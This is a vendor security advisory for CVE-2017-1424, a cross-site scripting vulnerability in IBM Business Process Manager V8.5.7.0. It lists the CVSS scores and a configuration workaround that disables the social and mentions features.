IBM BPM allows users to interact with one another without fully removing HTML markup. This might allow controlling parts of the user interface, possibly script injection.
CVEID: CVE-2017-1424**
DESCRIPTION:** IBM Business Process Manager is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
CVSS Base Score: 5.4
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/127477> for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
- IBM Business Process Manager Advanced V8.5.7.0 including cumulative fix 2017.06
For IBM BPM V8.5.7.0 through V8.5.7.0 CF 2017.06
Disable all Social Features or Mentions feature within the Social Feature by setting com.ibm.bpm.portal.disableSocial=allor com.ibm.bpm.portal.disableSocial=mentions… Consult the documentation <https://www.ibm.com/support/knowledgecenter/en/SSFTN5_8.5.7/com.ibm.wbpm.admin.doc/topics/tadm_portal_customprops_mashups.html> for detail.